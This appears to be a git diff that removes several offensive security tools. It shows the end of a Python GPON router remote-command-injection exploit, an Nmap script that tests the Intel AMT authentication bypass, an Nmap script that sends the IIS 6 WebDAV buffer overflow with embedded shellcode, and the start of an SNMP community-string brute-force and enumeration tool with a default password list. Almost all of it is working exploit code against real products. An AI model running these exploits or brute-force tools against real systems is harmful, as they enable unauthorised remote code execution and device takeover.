||||
|
||||
Coded by F3D
|
||||
Twitter: @f3d_0x0
|
||||
Medium: medium.com/@0xf3d
|
||||
________________________________________________________________
|
||||
|
||||
"""
|
||||
print ascii_art
|
||||
|
||||
def retrieve_results(target, command):
|
||||
try:
|
||||
fp = urllib2.urlopen(target + '/diag.html?images/', context=ctx)
|
||||
for line in fp.readlines():
|
||||
if 'diag_result = \"Can\'t resolv hostname for' in line:
|
||||
start = '['
|
||||
end = ';' + command +']'
|
||||
res = str(line[line.find(start)+len(start):line.rfind(end)])
|
||||
return res.replace('\\n', '\n')
|
||||
except Exception as e:
|
||||
print "[DEBUG] " + str(e) + '\n'
|
||||
print "[*] An error occured while retriving the result"
|
||||
|
||||
def send_command(url_bypass, payload):
|
||||
print "[*] Injecting command.."
|
||||
try:
|
||||
req = requests.Request('POST', url_bypass, data=payload)
|
||||
prepared = req.prepare()
|
||||
s = requests.Session()
|
||||
s.send(prepared)
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
banner()
|
||||
# Getting the parameters
|
||||
domain = sys.argv[1]
|
||||
command = sys.argv[2]
|
||||
# Create url and payload
|
||||
url_bypass = domain + '/GponForm/diag_Form?images/'
|
||||
payload = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`' + command + '`;' + command + '&ipv=0'
|
||||
# Injecting the command
|
||||
send_command(url_bypass, payload)
|
||||
print "[*] Waiting for results..zZz.."
|
||||
time.sleep(3)
|
||||
print "[*] Getting the results.."
|
||||
# Retrieve the output
|
||||
out = retrieve_results(domain, command)
|
||||
print ""
|
||||
print out
|
||||
print ""
|
||||
|
||||
except Exception as e:
|
||||
print "[DEBUG] " + str(e) + '\n'
|
||||
print "[ERROR] Usage: python gpon_rce.py TARGET_URL COMMAND"
|
||||
print "[ERROR] e.g. : python gpon_rce.py http://192.168.1.15 \'id\'\n"
|
||||
|
|
@ -1,94 +0,0 @@
|
|||
description = [[
|
||||
Detects if Intel Active Management Technology is vulnerable to the INTEL-SA-00075 authentication bypass
|
||||
vulnerability by attempting to perform digest authentication with a blank response parameter.
|
||||
]]
|
||||
|
||||
local http = require "http"
|
||||
local shortport = require "shortport"
|
||||
local vulns = require "vulns"
|
||||
local stdnse = require "stdnse"
|
||||
|
||||
---
|
||||
-- @usage
|
||||
-- nmap -p 16992 --script http-vuln-INTEL-SA-00075 <target>
|
||||
--
|
||||
-- @output
|
||||
-- PORT STATE SERVICE REASON
|
||||
-- 16992/tcp open amt-soap-http syn-ack
|
||||
-- | http-vuln-INTEL-SA-00075:
|
||||
-- | VULNERABLE:
|
||||
-- | Intel Active Management Technology INTEL-SA-00075 Authentication Bypass
|
||||
-- | State: VULNERABLE
|
||||
-- | IDs: CVE:CVE-2017-5689 BID:98269
|
||||
-- | Risk factor: High CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)
|
||||
-- | Intel Active Management Technology is vulnerable to an authentication bypass that
|
||||
-- | can be exploited by performing digest authentication and sending a blank response
|
||||
-- | digest parameter.
|
||||
-- |
|
||||
-- | Disclosure date: 2017-05-01
|
||||
-- | References:
|
||||
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689
|
||||
-- | https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr
|
||||
-- | http://www.securityfocus.com/bid/98269
|
||||
-- | https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
|
||||
-- | https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability
|
||||
-- |_ https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
|
||||
|
||||
author = "Andrew Orr"
|
||||
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
|
||||
categories = { "vuln", "auth", "exploit" }
|
||||
|
||||
portrule = shortport.portnumber({623, 664, 16992, 16993, 16994, 16995})
|
||||
|
||||
action = function(host, port)
|
||||
local vuln = {
|
||||
title = "Intel Active Management Technology INTEL-SA-00075 Authentication Bypass",
|
||||
state = vulns.STATE.NOT_VULN,
|
||||
risk_factor = "High",
|
||||
scores = {
|
||||
CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)",
|
||||
},
|
||||
description = [[
|
||||
Intel Active Management Technology is vulnerable to an authentication bypass that
|
||||
can be exploited by performing digest authentication and sending a blank response
|
||||
digest parameter.
|
||||
]],
|
||||
IDS = {
|
||||
CVE = "CVE-2017-5689",
|
||||
BID = "98269"
|
||||
},
|
||||
references = {
|
||||
'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr',
|
||||
'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability',
|
||||
'https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf',
|
||||
'https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability'
|
||||
},
|
||||
dates = {
|
||||
disclosure = { year = '2017', month = '05', day = '01' }
|
||||
}
|
||||
}
|
||||
|
||||
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
||||
|
||||
local response = http.get(host, port, '/index.htm')
|
||||
|
||||
if response.header['server']:find('Intel(R) Active Management Technology', 1, true) and response.status == 401 then
|
||||
local www_authenticate = http.parse_www_authenticate(response.header['www-authenticate'])
|
||||
auth_header = 'Digest ' ..
|
||||
'username="admin", ' ..
|
||||
'realm="' .. www_authenticate[1]['params']['realm'] .. '", ' ..
|
||||
'nonce="' .. www_authenticate[1]['params']['nonce'] .. '", ' ..
|
||||
'uri="/index.htm", ' ..
|
||||
'cnonce="' .. stdnse.generate_random_string(10) .. '", ' ..
|
||||
'nc=1, ' ..
|
||||
'qop="auth", ' ..
|
||||
'response=""'
|
||||
local opt = { header = { ['Authorization'] = auth_header } }
|
||||
local response2 = http.get(host, port, '/index.htm', opt)
|
||||
if response2.status == 200 then
|
||||
vuln.state = vulns.STATE.VULN
|
||||
end
|
||||
end
|
||||
|
||||
return vuln_report:make_output(vuln)
|
||||
end
|
||||
|
|
@ -1,181 +0,0 @@
|
|||
local nmap = require "nmap"
|
||||
local string = require "string"
|
||||
local shortport = require "shortport"
|
||||
local vulns = require "vulns"
|
||||
|
||||
-- NSE Buffer Overflow vulnerability in IIS
|
||||
|
||||
---
|
||||
-- @usage
|
||||
-- ./nmap iis-buffer-overflow <target>
|
||||
--
|
||||
-- @output
|
||||
-- PORT STATE SERVICE
|
||||
-- 80/tcp open http
|
||||
-- | iis-buffer-overflow:
|
||||
-- | VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
|
||||
-- | State: LIKELY_VULNERABLE
|
||||
-- | Risk factor: High CVSS: 10.0
|
||||
-- | Description:
|
||||
-- | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
|
||||
-- | service in Internet Information Services (IIS) 6.0
|
||||
-- | in Microsoft Windows Server 2003 R2 allows remote attackers to execute
|
||||
-- | arbitrary code via a long header beginning with "If: <http://" in a
|
||||
-- | PROPFIND request, as exploited in the wild in July or August 2016.
|
||||
-- |
|
||||
-- | Original exploit by Zhiniang Peng and Chen Wu.
|
||||
-- |
|
||||
-- | References:
|
||||
-- | https://github.com/edwardz246003/IIS_exploit,
|
||||
-- |_ https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
|
||||
--
|
||||
|
||||
author = {
|
||||
"Zhiniang Peng", -- Original author
|
||||
"Chen Wu", -- Original author
|
||||
"Rewanth Cool" -- NSE script author
|
||||
}
|
||||
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
|
||||
categories = {"exploit", "vuln", "intrusive"}
|
||||
|
||||
portrule = shortport.portnumber(80, "tcp")
|
||||
|
||||
action = function(host, port)
|
||||
local socket, response, try, catch, payload, shellcode, vulnerable_name
|
||||
|
||||
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
||||
local vuln = {
|
||||
title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
|
||||
state = vulns.STATE.NOT_VULN,
|
||||
risk_factor = "High",
|
||||
description = [[
|
||||
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
|
||||
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
|
||||
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
|
||||
|
||||
Original exploit by Zhiniang Peng and Chen Wu.
|
||||
]],
|
||||
IDS = {
|
||||
CVE = 'CVE-2017-7269'
|
||||
},
|
||||
scores = {
|
||||
CVSS = '10.0'
|
||||
},
|
||||
references = {
|
||||
'https://github.com/edwardz246003/IIS_exploit',
|
||||
'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
|
||||
},
|
||||
dates = {
|
||||
disclosure = {year = '2017', month = '03', day = '26'},
|
||||
}
|
||||
}
|
||||
|
||||
-- If domain name doesn't exist this line of code takes ip into consideration
|
||||
vulnerable_name = host.targetname or host.ip
|
||||
|
||||
socket = nmap.new_socket()
|
||||
catch = function()
|
||||
socket:close()
|
||||
end
|
||||
|
||||
try = nmap.new_try(catch)
|
||||
try(socket:connect(host, port))
|
||||
|
||||
-- Crafting the payload by parts
|
||||
|
||||
-- Crafting the request with HTTP PROPFIND method
|
||||
payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
|
||||
payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
|
||||
|
||||
-- Random text added to payload (Can be modified only for experimental purposes)
|
||||
payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
|
||||
payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
|
||||
payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
|
||||
payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
|
||||
payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
|
||||
payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
|
||||
payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
|
||||
payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
|
||||
payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
|
||||
payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
|
||||
payload = payload .. '\xb3\xe3\x95\xb7'
|
||||
|
||||
-- Main payload (Do not edit this part)
|
||||
payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
|
||||
payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
|
||||
payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
|
||||
payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
|
||||
payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
|
||||
payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
|
||||
payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
|
||||
|
||||
payload = payload .. '>'
|
||||
payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
|
||||
|
||||
-- Random text added to payload (Can be modified only for experimental purposes)
|
||||
payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
|
||||
payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
|
||||
payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
|
||||
payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
|
||||
payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
|
||||
payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
|
||||
payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
|
||||
payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
|
||||
payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
|
||||
payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
|
||||
|
||||
-- Main payload (Do not edit this part)
|
||||
payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
|
||||
payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
|
||||
payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
|
||||
payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
|
||||
payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
|
||||
payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
|
||||
payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
|
||||
payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
|
||||
payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
|
||||
payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
|
||||
payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
|
||||
|
||||
-- Shellcode
|
||||
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
|
||||
shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
|
||||
shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
|
||||
shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
|
||||
shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
|
||||
shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
|
||||
|
||||
payload = payload .. shellcode
|
||||
payload = payload .. '>\r\n\r\n'
|
||||
|
||||
-- Exploiting the vulnerability
|
||||
try(socket:send(payload))
|
||||
|
||||
-- We receive a 200 response if the payload succeeds.
|
||||
response = try(socket:receive_bytes(80960))
|
||||
socket:close()
|
||||
|
||||
-- Checking for 200 response in the response
|
||||
local regex = "HTTP/1.1 (%d+)"
|
||||
local status = string.match(response, regex)
|
||||
|
||||
if status == '200' then
|
||||
-- Buffer overflow is successfully executed on the server.
|
||||
vuln.state = vulns.STATE.EXPLOIT
|
||||
vuln.exploit_results = response
|
||||
elseif status == '400' then
|
||||
-- Bad request error is occured because webdav is not installed.
|
||||
vuln.state = vulns.STATE.LIKELY_VULN
|
||||
vuln.exploit_results = "Server returned 400: Install webdav and try again."
|
||||
elseif status == '502' then
|
||||
-- Likely to have an error in the Server Name
|
||||
vuln.state = vulns.STATE.LIKELY_VULN
|
||||
vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
|
||||
elseif status ~= nil then
|
||||
vuln.exploit_results = response
|
||||
end
|
||||
|
||||
return vuln_report:make_output(vuln)
|
||||
|
||||
end
|
||||
|
||||
789
bin/snmpbrute.py
789
bin/snmpbrute.py
|
|
@ -1,789 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
# SNMP Bruteforce & Enumeration Script
|
||||
# Requires metasploit, snmpwalk, snmpstat and john the ripper
|
||||
__version__ = 'v1.0b'
|
||||
from socket import socket, SOCK_DGRAM, AF_INET, timeout
|
||||
from random import randint
|
||||
from time import sleep
|
||||
import optparse, sys, os
|
||||
from subprocess import Popen, PIPE
|
||||
import struct
|
||||
import threading, thread
|
||||
import tempfile
|
||||
|
||||
from scapy.all import (SNMP, SNMPnext, SNMPvarbind, ASN1_OID, SNMPget, ASN1_DECODING_ERROR, ASN1_NULL, ASN1_IPADDRESS,
|
||||
SNMPset, SNMPbulk, IP)
|
||||
|
||||
##########################################################################################################
|
||||
# Defaults
|
||||
##########################################################################################################
|
||||
class defaults:
|
||||
rate=30.0
|
||||
timeOut=2.0
|
||||
port=161
|
||||
delay=2
|
||||
interactive=True
|
||||
verbose=False
|
||||
getcisco=True
|
||||
colour=True
|
||||
|
||||
default_communities=['','0','0392a0','1234','2read','3com','3Com','3COM','4changes','access','adm','admin','Admin','administrator','agent','agent_steal','all','all private','all public','anycom','ANYCOM','apc','bintec','blue','boss','c','C0de','cable-d','cable_docsispublic@es0','cacti','canon_admin','cascade','cc','changeme','cisco','CISCO','cmaker','comcomcom','community','core','CR52401','crest','debug','default','demo','dilbert','enable','entry','field','field-service','freekevin','friend','fubar','guest','hello','hideit','host','hp_admin','ibm','IBM','ilmi','ILMI','intel','Intel','intermec','Intermec','internal','internet','ios','isdn','l2','l3','lan','liteon','login','logon','lucenttech','lucenttech1','lucenttech2','manager','master','microsoft','mngr','mngt','monitor','mrtg','nagios','net','netman','network','nobody','NoGaH$@!','none','notsopublic','nt','ntopia','openview','operator','OrigEquipMfr','ourCommStr','pass','passcode','password','PASSWORD','pr1v4t3','pr1vat3','private',' private','private ','Private','PRIVATE','private@es0','Private@es0','private@es1','Private@es1','proxy','publ1c','public',' public','public ','Public','PUBLIC','public@es0','public@es1','public/RO','read','read-only','readwrite','read-write','red','regional','<removed>','rmon','rmon_admin','ro','root','router','rw','rwa','sanfran','san-fran','scotty','secret','Secret','SECRET','Secret C0de','security','Security','SECURITY','seri','server','snmp','SNMP','snmpd','snmptrap','snmp-Trap','SNMP_trap','SNMPv1/v2c','SNMPv2c','solaris','solarwinds','sun','SUN','superuser','supervisor','support','switch','Switch','SWITCH','sysadm','sysop','Sysop','system','System','SYSTEM','tech','telnet','TENmanUFactOryPOWER','test','TEST','test2','tiv0li','tivoli','topsecret','traffic','trap','user','vterm1','watch','watchit','windows','windowsnt','workstation','world','write','writeit','xyzzy','yellow','ILMI']
|
||||
|
||||
##########################################################################################################
|
||||
# OID's
|
||||
##########################################################################################################
|
||||
''' Credits
|
||||
Some OID's borowed from Cisc0wn script
|
||||
# Cisc0wn - The Cisco SNMP 0wner.
|
||||
# Daniel Compton
|
||||
# www.commonexploits.com
|
||||
# contact@commexploits.com
|
||||
'''
|
||||
|
||||
RouteOIDS={
|
||||
'ROUTDESTOID': [".1.3.6.1.2.1.4.21.1.1", "Destination"],
|
||||
'ROUTHOPOID': [".1.3.6.1.2.1.4.21.1.7", "Next Hop"],
|
||||
'ROUTMASKOID': [".1.3.6.1.2.1.4.21.1.11", "Mask"],
|
||||
'ROUTMETOID': [".1.3.6.1.2.1.4.21.1.3", "Metric"],
|
||||
'ROUTINTOID': [".1.3.6.1.2.1.4.21.1.2", "Interface"],
|
||||
'ROUTTYPOID': [".1.3.6.1.2.1.4.21.1.8", "Route type"],
|
||||
'ROUTPROTOID': [".1.3.6.1.2.1.4.21.1.9", "Route protocol"],
|
||||
'ROUTAGEOID': [".1.3.6.1.2.1.4.21.1.10", "Route age"]
|
||||
}
|
||||
|
||||
InterfaceOIDS={
|
||||
#Interface Info
|
||||
'INTLISTOID': [".1.3.6.1.2.1.2.2.1.2", "Interfaces"],
|
||||
'INTIPLISTOID': [".1.3.6.1.2.1.4.20.1.1", "IP address"],
|
||||
'INTIPMASKOID': [".1.3.6.1.2.1.4.20.1.3", "Subnet mask"],
|
||||
'INTSTATUSLISTOID':[".1.3.6.1.2.1.2.2.1.8", "Status"]
|
||||
}
|
||||
|
||||
ARPOIDS={
|
||||
# Arp table
|
||||
'ARPADDR': [".1.3.6.1.2.1.3.1 ","ARP address method A"],
|
||||
'ARPADDR2': [".1.3.6.1.2.1.3.1 ","ARP address method B"]
|
||||
}
|
||||
|
||||
OIDS={
|
||||
'SYSTEM':["iso.3.6.1.2.1.1 ","SYSTEM Info"]
|
||||
}
|
||||
|
||||
snmpstat_args={
|
||||
'Interfaces':["-Ci","Interface Info"],
|
||||
'Routing':["-Cr","Route Info"],
|
||||
'Netstat':["","Netstat"],
|
||||
#'Statistics':["-Cs","Stats"]
|
||||
}
|
||||
|
||||
'''Credits
|
||||
The following OID's are borrowed from snmpenum.pl script
|
||||
# ----by filip waeytens 2003----
|
||||
# ---- DA SCANIT CREW www.scanit.be ----
|
||||
# filip.waeytens@hushmail.com
|
||||
'''
|
||||
|
||||
WINDOWS_OIDS={
|
||||
'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
|
||||
'INSTALLED SOFTWARE': ["1.3.6.1.2.1.25.6.3.1.2","Installed Software"],
|
||||
'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
|
||||
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
|
||||
'DOMAIN': ["1.3.6.1.4.1.77.1.4.1","Domain"],
|
||||
'USERS': ["1.3.6.1.4.1.77.1.2.25","Users"],
|
||||
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
|
||||
'SHARES': ["1.3.6.1.4.1.77.1.2.27","Shares"],
|
||||
'DISKS': ["1.3.6.1.2.1.25.2.3.1.3","Disks"],
|
||||
'SERVICES': ["1.3.6.1.4.1.77.1.2.3.1.1","Services"],
|
||||
'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"],
|
||||
'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"]
|
||||
}
|
||||
|
||||
LINUX_OIDS={
|
||||
'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
|
||||
'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
|
||||
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
|
||||
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
|
||||
'MOUNTPOINTS': ["1.3.6.1.2.1.25.2.3.1.3","MountPoints"],
|
||||
'RUNNING SOFTWARE PATHS': ["1.3.6.1.2.1.25.4.2.1.4","Running Software Paths"],
|
||||
'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"],
|
||||
'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"]
|
||||
}
|
||||
|
||||
CISCO_OIDS={
|
||||
'LAST TERMINAL USERS': ["1.3.6.1.4.1.9.9.43.1.1.6.1.8","Last Terminal User"],
|
||||
'INTERFACES': ["1.3.6.1.2.1.2.2.1.2","Interfaces"],
|
||||
'SYSTEM INFO': ["1.3.6.1.2.1.1.1","System Info"],
|
||||
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
|
||||
'SNMP Communities': ["1.3.6.1.6.3.12.1.3.1.4","Communities"],
|
||||
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
|
||||
'IP ADDRESSES': ["1.3.6.1.2.1.4.20.1.1","IP Addresses"],
|
||||
'INTERFACE DESCRIPTIONS': ["1.3.6.1.2.1.31.1.1.1.18","Interface Descriptions"],
|
||||
'HARDWARE': ["1.3.6.1.2.1.47.1.1.1.1.2","Hardware"],
|
||||
'TACACS SERVER': ["1.3.6.1.4.1.9.2.1.5","TACACS Server"],
|
||||
'LOG MESSAGES': ["1.3.6.1.4.1.9.9.41.1.2.3.1.5","Log Messages"],
|
||||
'PROCESSES': ["1.3.6.1.4.1.9.9.109.1.2.1.1.2","Processes"],
|
||||
'SNMP TRAP SERVER': ["1.3.6.1.6.3.12.1.2.1.7","SNMP Trap Server"]
|
||||
}
|
||||
|
||||
##########################################################################################################
|
||||
# Classes
|
||||
##########################################################################################################
|
||||
|
||||
class SNMPError(Exception):
|
||||
'''Credits
|
||||
Class copied from sploitego project
|
||||
__original_author__ = 'Nadeem Douba'
|
||||
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
|
||||
'''
|
||||
pass
|
||||
|
||||
class SNMPVersion:
|
||||
'''Credits
|
||||
Class copied from sploitego project
|
||||
__original_author__ = 'Nadeem Douba'
|
||||
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
|
||||
'''
|
||||
v1 = 0
|
||||
v2c = 1
|
||||
v3 = 2
|
||||
|
||||
